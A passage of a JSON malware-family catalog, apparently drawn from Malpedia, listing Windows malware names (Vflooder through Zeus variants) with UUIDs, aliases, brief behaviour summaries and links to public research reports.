Most versions are protected by VMProtect.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" ], "synonyms": [], "type": [] }, "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" ], "synonyms": [], "type": [] }, "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", "value": "virdetdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" ], "synonyms": [], "type": [] }, "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", "value": "Virut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" ], "synonyms": [ "VMzeus", "Zberp", "ZeusVM" ], "type": [] }, "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", "value": "VM Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" ], "synonyms": [], "type": [] }, "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", "value": "Vobfus" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", "https://www.us-cert.gov/ncas/alerts/TA17-318B", "https://securelist.com/operation-applejeus/87553/" ], "synonyms": [ "FALLCHILL", "Manuscrypt" ], "type": [] }, "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", "value": "Volgmer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", "https://twitter.com/malware_traffic/status/821483557990318080" ], "synonyms": [], "type": [] }, "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", "value": "Vreikstadi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", "http://www.xylibox.com/2013/01/vskimmer.html", "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" ], "synonyms": [], "type": [] }, "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", "value": "vSkimmer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", "https://attack.mitre.org/wiki/Group/G0022" ], "synonyms": [], "type": [] }, "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", 
"https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" ], "synonyms": [ "Wana Decrypt0r", "WannaCry", "Wcry" ], "type": [] }, "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", "value": "WannaCryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" ], "synonyms": [], "type": [] }, "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", "value": "WaterMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d238262a-4832-408f-9926-a7174e671b50", "value": "WaterSpout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", "value": "WebC2-AdSpace" }, { 
"description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", "value": "WebC2-Ausov" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", "value": "WebC2-Bolid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", "value": "WebC2-Cson" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "acdda3e5-e776-419b-b060-14f3406de061", "value": "WebC2-DIV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", "value": "WebC2-GreenCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": 
"f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", "value": "WebC2-Head" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", "value": "WebC2-Kt3" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", "value": "WebC2-Qbp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", "value": "WebC2-Rave" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", "value": "WebC2-Table" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", "value": "WebC2-UGX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], 
"synonyms": [], "type": [] }, "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", "value": "WebC2-Yahoo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" ], "synonyms": [], "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", "value": "WebMonitor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" ], "synonyms": [], "type": [] }, "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", "value": "WellMess" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" ], "synonyms": [], "type": [] }, "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", "value": "WildFire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "6a100902-7204-4f20-b838-545ed86d4428", "value": "WinMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://github.com/TKCERT/winnti-suricata-lua", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-nmap-script", "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", "https://github.com/TKCERT/winnti-detector", "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" ], "synonyms": [], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": 
"Winnti (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [], "type": [] }, "uuid": "db755407-4135-414c-90e3-97f5e48c6065", "value": "Winsloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" ], "synonyms": [], "type": [] }, "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", "value": "Wipbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", "https://secrary.com/ReversingMalware/WMIGhost/", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [ "Syndicasec", "Wimmie" ], "type": [] }, "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", "value": "WMI Ghost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", "value": "WndTest" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" ], "synonyms": [], "type": [] }, "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", "value": "Wonknu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" ], "synonyms": [], "type": [] }, "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", 
"value": "woody" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "WoolenLogger" ], "type": [] }, "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [ "chopstick", "splm" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" ], "synonyms": [], "type": [] }, "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", "value": "XBot POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" ], "synonyms": [], "type": [] }, "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", "value": "XBTL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", "value": "Xpan" 
}, { "description": "Incorporates code of Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" ], "synonyms": [ "Expectra" ], "type": [] }, "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", "value": "XPCTRA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" ], "synonyms": [], "type": [] }, "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", "value": "XP PrivEsc (CVE-2014-4076)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "nokian" ], "type": [] }, "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", "value": "xsPlus" }, { "description": "X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", 
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf" ], "synonyms": [ "xaps" ], "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", "value": "X-Tunnel" }, { "description": "This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net", "https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28" ], "synonyms": [], "type": [] }, "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ "ShadowWalker" ], "type": [] }, "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", "value": "xxmm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "KeyBoy" ], "type": [] }, "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", "value": "Yahoyah" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" ], "synonyms": [ "aumlib", "bbsinfo" ], "type": [] }, "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", "value": "yayih" }, { "description": "Simple malware with proxy/RDP and 
download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", "https://www.youtube.com/watch?v=AUGxYhE_CUY" ], "synonyms": [ "DarkShare" ], "type": [] }, "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", "value": "YoungLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" ], "synonyms": [], "type": [] }, "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", "value": "yty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" ], "synonyms": [ "Zekapab" ], "type": [] }, "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", "value": "Zebrocy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" ], "synonyms": [], "type": [] }, "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", "value": "Zebrocy (AutoIT)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" ], "synonyms": [], "type": [] }, "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", "value": "Zedhou" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" ], "synonyms": [ "Max++", "Smiscer" ], "type": [] }, "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", "value": "ZeroAccess" }, { "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS is started that connects to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all passwords from the Windows.Security.Credentials.PasswordVault. 
Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", "value": "ZeroEvil" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" ], "synonyms": [], "type": [] }, "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", "value": "ZeroT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", "https://zeustracker.abuse.ch/monitor.php", "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://eternal-todo.com/blog/new-zeus-binary", "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", "https://www.mnin.org/write/ZeusMalware.pdf", "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", "http://eternal-todo.com/blog/zeus-spreading-facebook", "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", 
"http://eternal-todo.com/blog/detecting-zeus", "https://www.secureworks.com/research/zeus?threat=zeus", "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" ], "synonyms": [ "Zbot" ], "type": [] }, "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", "value": "Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" ], "synonyms": [], "type": [] }, "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", "value": "Zeus MailSniffer" }, { "description": "This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.\r\n\r\nIn June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB.\r\nIn January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. 
Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl", "https://asert.arbornetworks.com/great-dga-sphinx/", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" ], "synonyms": [ "XSphinx" ], "type": [] }, "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", "value": "Zeus OpenSSL" }, { "description": "This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9.\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. 
Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html", "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/" ], "synonyms": [], "type": [] }, "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", "value": "Zeus Sphinx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", "https://twitter.com/siri_urz/status/923479126656323584", 